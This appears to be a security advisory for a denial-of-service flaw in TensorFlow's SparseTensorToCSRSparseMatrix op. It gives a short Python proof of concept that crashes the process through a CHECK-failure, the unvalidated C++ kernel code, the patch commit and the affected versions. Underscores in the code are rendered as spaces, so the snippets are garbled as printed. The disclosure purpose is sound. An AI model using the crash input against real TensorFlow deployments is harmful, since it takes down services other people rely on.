PT-2026-59964 · Pypi · Tensorflow-Cpu

Published

2026-07-09

·

Updated

2026-07-09

CVSS v3.1

5.5

Medium

VectorAV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Impact

The implementation of [tf.raw ops.SparseTensorToCSRSparseMatrix](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/sparse/sparse tensor to csr sparse matrix op.cc#L65-L119) does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack:
python
import tensorflow as tf

indices = tf.constant(53, shape=[3], dtype=tf.int64)
values = tf.constant(0.554979503, shape=[218650], dtype=tf.float32)
dense shape = tf.constant(53, shape=[3], dtype=tf.int64)
  
tf.raw ops.SparseTensorToCSRSparseMatrix(
 indices=indices,
 values=values,
 dense shape=dense shape)
The code assumes dense shape is a vector and indices is a matrix (as part of requirements for sparse tensors) but there is no validation for this:
cc
  const Tensor& indices = ctx->input(0);
  const Tensor& values = ctx->input(1);
  const Tensor& dense shape = ctx->input(2);
  const int rank = dense shape.NumElements();
  OP REQUIRES(ctx, rank == 2 || rank == 3,
        errors::InvalidArgument("SparseTensor must have rank 2 or 3; ",
                    "but indices has rank: ", rank));
  auto dense shape vec = dense shape.vec<int64 t>();
  // ...
  OP REQUIRES OK(
    ctx,
    coo to csr(batch size, num rows, indices.template matrix<int64 t>(),
          batch ptr.vec<int32>(), csr row ptr.vec<int32>(),
          csr col ind.vec<int32>()));

Patches

We have patched the issue in GitHub commit ea50a40e84f6bff15a0912728e35b657548cef11.
The fix will be included in TensorFlow 2.9.0. We will also cherrypick this commit on TensorFlow 2.8.1, TensorFlow 2.7.2, and TensorFlow 2.6.4, as these are also affected and still in supported range.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou from Secure Systems Lab at Brown University.

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

Related Identifiers

PYSEC-2026-3350

Affected Products

Tensorflow-Cpu